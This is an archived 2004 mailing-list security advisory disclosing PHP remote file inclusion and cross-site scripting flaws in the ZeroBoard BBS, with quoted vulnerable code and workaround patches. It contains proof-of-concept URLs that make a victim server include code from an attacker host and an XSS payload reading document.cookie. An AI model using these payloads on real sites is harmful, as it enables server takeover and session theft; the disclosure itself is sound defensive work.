| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <GKEOJIPDJOHGOEEOIINIMECPCBAA.advisory@stgsecurity.com>
From: advisory at stgsecurity.com (SSR Team)
Subject: STG Security Advisory: [SSA-20041220-16] PHP
source injection and cross-site scripting vulnerabilities in
ZeroBoard
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard
Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@...security.com)
Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.
Vulnerability Class
===================
Implementation Error: Input validation flaw
Impact
======
High : arbitrary commands execution.
Affected Products
================
ZeroBoard 4.1pl4 and prior
Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.
Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
- - - Environment
PHP 5.0.x
php.ini : register_globals = On
- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.
- - - Part of vulnerable source, outlogin.php.
- - ----
// ???? ???? ?? ??
if(!file_exists($_zb_path."lib.php")) {
echo "???? ????? ????";
return;
}
// _head.php ??
@include $_zb_path."_head.php";
}
- - ----
Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/
- - - Environment
php.ini: register_globals = On
- - - Reason
Uninitialized $dir variable in write.php
- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----
Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>
- - - Reason
check_user_id.php doesn't validate the input value of user_id.
- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... ?? ...
if($check[0]) echo "$user_id ? ?? ???<br> ??????";
else echo"$user_id ? ????? ????";
... ?? ...
- - ----
Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.
Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,
if(eregi(":\/\/",$_zb_path)) $_zb_path="";
Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,
if(eregi(":\/\/",$dir)) $dir="";
Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,
$user_id = htmlspecialchars(trim($user_id));
Credits
======
Jeremy Bae at STG Security
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists